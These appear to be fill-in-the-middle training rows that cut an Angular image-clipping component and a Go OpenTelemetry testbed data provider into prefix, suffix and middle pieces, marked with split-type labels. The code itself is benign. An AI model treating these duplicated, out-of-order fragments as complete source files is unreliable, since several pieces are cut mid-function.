// this.alertService.playToast('Failed', `There is an error while uploading ${f.name}. Try again`, 1);
},
() => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
}
);
})
.catch((error: any) => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
this.restoreBox();
console.error('oops, something went wrong!', error);
});
});
}
cleanBox() {
(this._handles.nativeElement as HTMLElement).setAttribute('hidden', 'true');
$(this._clipbox.nativeElement as HTMLElement).removeClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).removeClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).removeClass('inside-10');
}
restoreBox() {
this.extra = 1;
(this._handles.nativeElement as HTMLElement).removeAttribute('hidden');
$(this._clipbox.nativeElement as HTMLElement).addClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).addClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).addClass('inside-10');
}
onSetClipPath(event: ClipPath) {
this.clipPath = event;
if (event.type=='circle' || event.type=='ellipse' || event.type == 'svg') {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
this.setClipboxSize();
}
this.refreshView();
}
onSetOutsideClip(event: number) {
if (!this.clipPath) return;
this.clipPath.outside = event;
this.refreshView();
}
getPolygon(): string{
let result: string = '';
this.clipPath.value.forEach((v, i) => {
if (i>0)
result += ',';
result += v.x + '% ' + v.y + '%';
})
if (result != '')
result = 'polygon(' + result + ')';
return result;
}
getCircle(): string{
return 'circle(' + Math.abs(50-this.clipPath.value[0].y) + '% at ' + this.clipPath.value[1].x + '% ' + this.clipPath.value[1].y + '%)';
}
getEllipse(): string |
getInset(): string{
return 'inset(' + this.clipPath.value[0].y + '% ' + (100 - this.clipPath.value[1].x) + '% ' + (100 - this.clipPath.value[2].y) + '% ' + this.clipPath.value[3].x + '%)';
}
getClipPath() {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.sanitizer.bypassSecurityTrustStyle(this.getPolygon());
case 'ellipse':
return this.sanitizer.bypassSecurityTrustStyle(this.getEllipse());
case 'circle':
return this.sanitizer.bypassSecurityTrustStyle(this.getCircle());
case 'inset':
return this.sanitizer.bypassSecurityTrustStyle(this.getInset());
case 'svg':
return 'url(#svgPath)';
}
return '';
}
getClipPath1() {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.getPolygon();
case 'ellipse':
return this.getEllipse();
case 'circle':
return this.getCircle();
case 'inset':
return this.getInset();
}
return '';
}
getSVGPath() {
let p =[1,2,3,4,5,6,7,1,0];
let result = 'M ' + (this.extra * this.clipPath.value[0].x) + ' ' + (this.extra * this.clipPath.value[0].y) + ' ';
for(let i = 0; i < 3; i++) {
result += 'C ';
for(let j = 0; j < 3; j++) {
result += (this.extra * this.clipPath.value[p[i*3 + j]].x) + ' ' + (this.extra * this.clipPath.value[p[i*3 + j]].y) + ' ';
}
}
result +='Z ';
return result;
}
getOpacity() {
return this.clipPath ? this.clipPath.outside : 1;
}
getXPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pWidth * p;
}
getYPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pHeight * p;
}
removalHandler(i: number) {
if (this.clipPath.type=='svg') return false;
if (this._totalHandlers < 4) return false;
return this._currentHandler == i ? true : false;
}
backgroundImage(): SafeStyle {
// this.resultImage.nativeElement.style.setProperty('background-image', imageUrl.imageUrl(this.itemContent.image));
// return this.image ? this.sanitizer.bypassSecurityTrustStyle(`url('${this.image.location + "/" + this.image.name}')`) : '';
return this.sanitizer.bypassSecurityTrustStyle(imageUrl.imageUrl(this.image));
}
onRemoveHandler(i: number) {
this.clipPath.value.splice(i,1);
this.refreshView();
}
onDragStart(n: number, event: any) {
this._currentHandler = n;
setTimeout(() => {
this._currentHandler = -1;
this.refreshView();
}, 2000);
}
onDrag(n: number, event: any) {
this.clipPath.value[n].x = this.clipPath.type=='svg' ? event.left : event.left / this.pWidth;
this.clipPath.value[n].y = this.clipPath.type=='svg' ? event.top : event.top / this.pHeight;
this.refreshView();
}
onDragEnd(n: number, event: any) {
this.refreshView();
}
refreshView(loading: boolean = false) {
this._loading = loading;
this._totalHandlers = this.clipPath.value.length;
this.changeDetector.detectChanges();
}
ngOnDestroy() {
if (this.subs) {
this.subs.forEach(s => s.unsubscribe());
}
}
}
| {
return 'ellipse(' + Math.abs(50-this.clipPath.value[0].x) + '% ' + Math.abs(50-this.clipPath.value[1].y) + '% at ' + this.clipPath.value[2].x + '% ' + this.clipPath.value[2].y + '%)';
} | identifier_body |
image-clip.component.ts | import { ViewChild, Component, ElementRef, ChangeDetectorRef, SimpleChanges, AfterViewInit,
OnInit, OnChanges, OnDestroy, Input, Output, EventEmitter
} from '@angular/core';
import { HttpEventType } from '@angular/common/http';
import { DomSanitizer, SafeStyle } from '@angular/platform-browser';
import * as Rx from 'rxjs/Rx';
import * as lodash from 'lodash';
import * as domtoimage from 'dom-to-image';
import * as html2canvas from "html2canvas";
import { LoadingComponent } from '@app-ui/loading/loading.component';
import { ImagePath, ClipPath } from '@app/models';
import { AppService } from '@app/app.service';
import { UUID } from '@app-lib/uuid/uuid.service';
import * as imageUrl from '@app-lib/functions/image-url';
// ----------------------------------------------------------------
// Component
// ----------------------------------------------------------------
@Component({
moduleId : module.id,
selector : 'image-clip',
templateUrl: './image-clip.component.html',
styleUrls: [
'./image-clip.component.css',
]
})
export class ImageClipComponent implements OnInit, OnChanges, OnDestroy {
@Input() image: ImagePath = null;
@Output() placeOnPage = new EventEmitter<ImagePath>();
@Output() close = new EventEmitter<void>();
@ViewChild('clipbox') public _clipbox: ElementRef;
get clipboxElem(): HTMLElement { return (this._clipbox.nativeElement as HTMLElement); }
@ViewChild(LoadingComponent) loadingComponent: LoadingComponent;
@ViewChild('shadowboard') public _shadowboard: ElementRef;
@ViewChild('clipboard') public _clipboard: ElementRef;
@ViewChild('clipboardPath') public _clipboardPath: ElementRef;
@ViewChild('handles') public _handles: ElementRef;
public clipPath: ClipPath = null;
public _currentHandler: number = -1;
public _totalHandlers: number = 0;
public _loading: boolean = false;
private pWidth: number = 2.8; // (300 - 20) / 100
private pHeight: number = 2.8;
private extra: number = 1;
private subs: Rx.Subscription[] = [];
constructor(
private changeDetector: ChangeDetectorRef,
public elementRef: ElementRef,
private sanitizer: DomSanitizer,
private appService: AppService
) { }
ngOnInit() {
if (this.image)
this.setClipboxSize();
}
ngOnChanges(changes: SimpleChanges) {
if (changes['image'] && changes['image'].currentValue)
this.setClipboxSize();
}
setClipboxSize() {
if (!this.image) return;
if (this.clipPath && (this.clipPath.type == 'circle' || this.clipPath.type == 'ellipse')) {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
let width = 880;
let height = 480;
let img = new Image;
img.src = this.image.location + '/' + this.image.name;
let imgHeight = img.height;
let imgWidth = img.width;
if ( imgWidth > width) {
imgHeight = imgHeight * (width / imgWidth);
imgWidth = width;
}
if (imgHeight > height) {
imgWidth = imgWidth * (height / imgHeight);
imgHeight = height;
}
this.pHeight = imgHeight / 100;
this.pWidth = imgWidth / 100;
}
}
onSetCommand(event: string) {
this.changeDetector.detach();
switch (event) {
case 'PlaceOnPage':
this.onSaveImage();
break;
case 'Back':
this.close.emit();
}
}
onSaveImage() {
if (!this.image) return;
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).addClass('disable');
this.extra = 1.07142857142;
this.refreshView(true);
this.cleanBox();
setTimeout(() => {
// html2canvas(this.clipboxElem, {
// allowTaint: false,
// useCORS: true,
// logging: false,
// imageTimeout: 0,
// backgroundColor: "#FFFFFF",
// // scale: scale
// })
// .then(canvas => {
// let dataImage = canvas.toDataURL("image/jpeg", 0.92); //image/png
// // let dataImage = canvas.toDataURL('image/png'); //image/png
// let imageFile = this.appService.dataURLtoFile(
// dataImage,
// this.image.name + '_clip_' + UUID.UUID() + '.png'
// );
domtoimage.toPng(this.clipboxElem)
.then((dataURL: any) => {
const imageFile = this.appService.dataURLtoFile(dataURL, decodeURIComponent(this.image.name) + '-clip' + UUID.UUID() + '.png');
this.appService.uploadImages([imageFile]).subscribe(
event => {
switch (event.type) {
case HttpEventType.Sent:
// console.log(`Uploading file "${index}" of size ${f.size}.`);
break;
case HttpEventType.UploadProgress:
if (this.loadingComponent)
this.loadingComponent.set(Math.min(event.loaded / event.total * 100, 98));
break;
case HttpEventType.Response:
if (this.loadingComponent)
this.loadingComponent.complete();
const tuid = lodash.get(event, 'body.tuid');
const img = lodash.get(event, ['body', 'urls', 0]);
if (tuid) {
localStorage.setItem('tuid', lodash.get(event, 'body.tuid'));
}
if (img) {
this.placeOnPage.emit(img as ImagePath);
}
break;
// default:
// console.log(`File "${index}" surprising upload event: ${event.type}.`);
}
},
error => {
console.log(error);
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
// this.alertService.playToast('Failed', `There is an error while uploading ${f.name}. Try again`, 1);
},
() => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
}
);
})
.catch((error: any) => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
this.restoreBox();
console.error('oops, something went wrong!', error);
});
});
}
cleanBox() {
(this._handles.nativeElement as HTMLElement).setAttribute('hidden', 'true');
$(this._clipbox.nativeElement as HTMLElement).removeClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).removeClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).removeClass('inside-10');
}
restoreBox() {
this.extra = 1;
(this._handles.nativeElement as HTMLElement).removeAttribute('hidden');
$(this._clipbox.nativeElement as HTMLElement).addClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).addClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).addClass('inside-10');
}
onSetClipPath(event: ClipPath) {
this.clipPath = event;
if (event.type=='circle' || event.type=='ellipse' || event.type == 'svg') {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
this.setClipboxSize();
}
this.refreshView();
}
onSetOutsideClip(event: number) {
if (!this.clipPath) return;
this.clipPath.outside = event;
this.refreshView();
}
getPolygon(): string{
let result: string = '';
this.clipPath.value.forEach((v, i) => {
if (i>0)
result += ',';
result += v.x + '% ' + v.y + '%';
})
if (result != '')
result = 'polygon(' + result + ')';
return result;
}
getCircle(): string{
return 'circle(' + Math.abs(50-this.clipPath.value[0].y) + '% at ' + this.clipPath.value[1].x + '% ' + this.clipPath.value[1].y + '%)';
}
getEllipse(): string{
return 'ellipse(' + Math.abs(50-this.clipPath.value[0].x) + '% ' + Math.abs(50-this.clipPath.value[1].y) + '% at ' + this.clipPath.value[2].x + '% ' + this.clipPath.value[2].y + '%)';
}
getInset(): string{
return 'inset(' + this.clipPath.value[0].y + '% ' + (100 - this.clipPath.value[1].x) + '% ' + (100 - this.clipPath.value[2].y) + '% ' + this.clipPath.value[3].x + '%)';
}
| () {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.sanitizer.bypassSecurityTrustStyle(this.getPolygon());
case 'ellipse':
return this.sanitizer.bypassSecurityTrustStyle(this.getEllipse());
case 'circle':
return this.sanitizer.bypassSecurityTrustStyle(this.getCircle());
case 'inset':
return this.sanitizer.bypassSecurityTrustStyle(this.getInset());
case 'svg':
return 'url(#svgPath)';
}
return '';
}
getClipPath1() {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.getPolygon();
case 'ellipse':
return this.getEllipse();
case 'circle':
return this.getCircle();
case 'inset':
return this.getInset();
}
return '';
}
getSVGPath() {
let p =[1,2,3,4,5,6,7,1,0];
let result = 'M ' + (this.extra * this.clipPath.value[0].x) + ' ' + (this.extra * this.clipPath.value[0].y) + ' ';
for(let i = 0; i < 3; i++) {
result += 'C ';
for(let j = 0; j < 3; j++) {
result += (this.extra * this.clipPath.value[p[i*3 + j]].x) + ' ' + (this.extra * this.clipPath.value[p[i*3 + j]].y) + ' ';
}
}
result +='Z ';
return result;
}
getOpacity() {
return this.clipPath ? this.clipPath.outside : 1;
}
getXPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pWidth * p;
}
getYPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pHeight * p;
}
removalHandler(i: number) {
if (this.clipPath.type=='svg') return false;
if (this._totalHandlers < 4) return false;
return this._currentHandler == i ? true : false;
}
backgroundImage(): SafeStyle {
// this.resultImage.nativeElement.style.setProperty('background-image', imageUrl.imageUrl(this.itemContent.image));
// return this.image ? this.sanitizer.bypassSecurityTrustStyle(`url('${this.image.location + "/" + this.image.name}')`) : '';
return this.sanitizer.bypassSecurityTrustStyle(imageUrl.imageUrl(this.image));
}
onRemoveHandler(i: number) {
this.clipPath.value.splice(i,1);
this.refreshView();
}
onDragStart(n: number, event: any) {
this._currentHandler = n;
setTimeout(() => {
this._currentHandler = -1;
this.refreshView();
}, 2000);
}
onDrag(n: number, event: any) {
this.clipPath.value[n].x = this.clipPath.type=='svg' ? event.left : event.left / this.pWidth;
this.clipPath.value[n].y = this.clipPath.type=='svg' ? event.top : event.top / this.pHeight;
this.refreshView();
}
onDragEnd(n: number, event: any) {
this.refreshView();
}
refreshView(loading: boolean = false) {
this._loading = loading;
this._totalHandlers = this.clipPath.value.length;
this.changeDetector.detectChanges();
}
ngOnDestroy() {
if (this.subs) {
this.subs.forEach(s => s.unsubscribe());
}
}
}
| getClipPath | identifier_name |
image-clip.component.ts | import { ViewChild, Component, ElementRef, ChangeDetectorRef, SimpleChanges, AfterViewInit,
OnInit, OnChanges, OnDestroy, Input, Output, EventEmitter
} from '@angular/core';
import { HttpEventType } from '@angular/common/http';
import { DomSanitizer, SafeStyle } from '@angular/platform-browser';
import * as Rx from 'rxjs/Rx';
import * as lodash from 'lodash';
import * as domtoimage from 'dom-to-image';
import * as html2canvas from "html2canvas";
import { LoadingComponent } from '@app-ui/loading/loading.component';
import { ImagePath, ClipPath } from '@app/models';
import { AppService } from '@app/app.service';
import { UUID } from '@app-lib/uuid/uuid.service';
import * as imageUrl from '@app-lib/functions/image-url';
// ----------------------------------------------------------------
// Component
// ----------------------------------------------------------------
@Component({
moduleId : module.id,
selector : 'image-clip',
templateUrl: './image-clip.component.html',
styleUrls: [
'./image-clip.component.css',
]
})
export class ImageClipComponent implements OnInit, OnChanges, OnDestroy {
@Input() image: ImagePath = null;
@Output() placeOnPage = new EventEmitter<ImagePath>();
@Output() close = new EventEmitter<void>();
@ViewChild('clipbox') public _clipbox: ElementRef;
get clipboxElem(): HTMLElement { return (this._clipbox.nativeElement as HTMLElement); }
@ViewChild(LoadingComponent) loadingComponent: LoadingComponent;
@ViewChild('shadowboard') public _shadowboard: ElementRef;
@ViewChild('clipboard') public _clipboard: ElementRef;
@ViewChild('clipboardPath') public _clipboardPath: ElementRef;
@ViewChild('handles') public _handles: ElementRef;
public clipPath: ClipPath = null;
public _currentHandler: number = -1;
public _totalHandlers: number = 0;
public _loading: boolean = false;
private pWidth: number = 2.8; // (300 - 20) / 100
private pHeight: number = 2.8;
private extra: number = 1;
private subs: Rx.Subscription[] = [];
constructor(
private changeDetector: ChangeDetectorRef,
public elementRef: ElementRef,
private sanitizer: DomSanitizer,
private appService: AppService
) { }
ngOnInit() {
if (this.image)
this.setClipboxSize();
}
ngOnChanges(changes: SimpleChanges) {
if (changes['image'] && changes['image'].currentValue)
this.setClipboxSize();
}
setClipboxSize() {
if (!this.image) return;
if (this.clipPath && (this.clipPath.type == 'circle' || this.clipPath.type == 'ellipse')) {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
let width = 880;
let height = 480;
let img = new Image;
img.src = this.image.location + '/' + this.image.name;
let imgHeight = img.height;
let imgWidth = img.width;
if ( imgWidth > width) {
imgHeight = imgHeight * (width / imgWidth);
imgWidth = width;
}
if (imgHeight > height) {
imgWidth = imgWidth * (height / imgHeight);
imgHeight = height;
}
this.pHeight = imgHeight / 100;
this.pWidth = imgWidth / 100;
}
}
onSetCommand(event: string) {
this.changeDetector.detach();
switch (event) {
case 'PlaceOnPage':
this.onSaveImage();
break;
case 'Back':
this.close.emit();
}
}
onSaveImage() {
if (!this.image) return;
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).addClass('disable');
this.extra = 1.07142857142;
this.refreshView(true);
this.cleanBox();
setTimeout(() => {
// html2canvas(this.clipboxElem, {
// allowTaint: false,
// useCORS: true,
// logging: false,
// imageTimeout: 0,
// backgroundColor: "#FFFFFF",
// // scale: scale
// })
// .then(canvas => {
// let dataImage = canvas.toDataURL("image/jpeg", 0.92); //image/png
// // let dataImage = canvas.toDataURL('image/png'); //image/png
// let imageFile = this.appService.dataURLtoFile(
// dataImage,
// this.image.name + '_clip_' + UUID.UUID() + '.png'
// );
domtoimage.toPng(this.clipboxElem)
.then((dataURL: any) => {
const imageFile = this.appService.dataURLtoFile(dataURL, decodeURIComponent(this.image.name) + '-clip' + UUID.UUID() + '.png');
this.appService.uploadImages([imageFile]).subscribe(
event => {
switch (event.type) {
case HttpEventType.Sent:
// console.log(`Uploading file "${index}" of size ${f.size}.`);
break;
case HttpEventType.UploadProgress:
if (this.loadingComponent)
this.loadingComponent.set(Math.min(event.loaded / event.total * 100, 98));
break;
case HttpEventType.Response:
if (this.loadingComponent)
this.loadingComponent.complete();
const tuid = lodash.get(event, 'body.tuid');
const img = lodash.get(event, ['body', 'urls', 0]);
if (tuid) {
localStorage.setItem('tuid', lodash.get(event, 'body.tuid'));
}
if (img) {
this.placeOnPage.emit(img as ImagePath);
}
break;
// default:
// console.log(`File "${index}" surprising upload event: ${event.type}.`);
}
},
error => {
console.log(error);
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
// this.alertService.playToast('Failed', `There is an error while uploading ${f.name}. Try again`, 1);
},
() => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
}
);
})
.catch((error: any) => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
this.restoreBox();
console.error('oops, something went wrong!', error);
});
});
}
cleanBox() {
(this._handles.nativeElement as HTMLElement).setAttribute('hidden', 'true');
$(this._clipbox.nativeElement as HTMLElement).removeClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).removeClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).removeClass('inside-10');
}
restoreBox() {
this.extra = 1;
(this._handles.nativeElement as HTMLElement).removeAttribute('hidden');
$(this._clipbox.nativeElement as HTMLElement).addClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).addClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).addClass('inside-10');
}
onSetClipPath(event: ClipPath) {
this.clipPath = event;
if (event.type=='circle' || event.type=='ellipse' || event.type == 'svg') {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
this.setClipboxSize();
}
this.refreshView();
}
onSetOutsideClip(event: number) {
if (!this.clipPath) return;
this.clipPath.outside = event;
this.refreshView();
}
getPolygon(): string{
let result: string = '';
this.clipPath.value.forEach((v, i) => {
if (i>0)
result += ',';
result += v.x + '% ' + v.y + '%';
})
if (result != '')
result = 'polygon(' + result + ')';
return result;
}
getCircle(): string{
return 'circle(' + Math.abs(50-this.clipPath.value[0].y) + '% at ' + this.clipPath.value[1].x + '% ' + this.clipPath.value[1].y + '%)';
}
getEllipse(): string{
return 'ellipse(' + Math.abs(50-this.clipPath.value[0].x) + '% ' + Math.abs(50-this.clipPath.value[1].y) + '% at ' + this.clipPath.value[2].x + '% ' + this.clipPath.value[2].y + '%)';
}
getInset(): string{
return 'inset(' + this.clipPath.value[0].y + '% ' + (100 - this.clipPath.value[1].x) + '% ' + (100 - this.clipPath.value[2].y) + '% ' + this.clipPath.value[3].x + '%)';
}
getClipPath() {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.sanitizer.bypassSecurityTrustStyle(this.getPolygon());
case 'ellipse':
return this.sanitizer.bypassSecurityTrustStyle(this.getEllipse());
case 'circle':
return this.sanitizer.bypassSecurityTrustStyle(this.getCircle());
case 'inset':
return this.sanitizer.bypassSecurityTrustStyle(this.getInset());
case 'svg':
return 'url(#svgPath)';
}
return '';
}
getClipPath1() {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.getPolygon();
case 'ellipse':
return this.getEllipse();
case 'circle':
return this.getCircle();
case 'inset':
return this.getInset();
}
return '';
}
getSVGPath() {
let p =[1,2,3,4,5,6,7,1,0];
let result = 'M ' + (this.extra * this.clipPath.value[0].x) + ' ' + (this.extra * this.clipPath.value[0].y) + ' ';
for(let i = 0; i < 3; i++) {
result += 'C ';
for(let j = 0; j < 3; j++) {
result += (this.extra * this.clipPath.value[p[i*3 + j]].x) + ' ' + (this.extra * this.clipPath.value[p[i*3 + j]].y) + ' ';
}
}
result +='Z ';
return result;
}
getOpacity() {
return this.clipPath ? this.clipPath.outside : 1;
}
getXPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pWidth * p;
}
getYPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pHeight * p;
}
removalHandler(i: number) {
if (this.clipPath.type=='svg') return false;
if (this._totalHandlers < 4) return false;
return this._currentHandler == i ? true : false;
}
backgroundImage(): SafeStyle {
// this.resultImage.nativeElement.style.setProperty('background-image', imageUrl.imageUrl(this.itemContent.image));
// return this.image ? this.sanitizer.bypassSecurityTrustStyle(`url('${this.image.location + "/" + this.image.name}')`) : '';
return this.sanitizer.bypassSecurityTrustStyle(imageUrl.imageUrl(this.image));
}
onRemoveHandler(i: number) {
this.clipPath.value.splice(i,1);
this.refreshView();
}
onDragStart(n: number, event: any) {
this._currentHandler = n;
setTimeout(() => {
this._currentHandler = -1;
this.refreshView();
}, 2000);
}
onDrag(n: number, event: any) {
this.clipPath.value[n].x = this.clipPath.type=='svg' ? event.left : event.left / this.pWidth;
this.clipPath.value[n].y = this.clipPath.type=='svg' ? event.top : event.top / this.pHeight;
this.refreshView();
}
onDragEnd(n: number, event: any) {
this.refreshView();
}
refreshView(loading: boolean = false) {
this._loading = loading;
this._totalHandlers = this.clipPath.value.length;
this.changeDetector.detectChanges();
}
| ngOnDestroy() {
if (this.subs) {
this.subs.forEach(s => s.unsubscribe());
}
}
} | random_line_split | |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters.
type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) | (dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
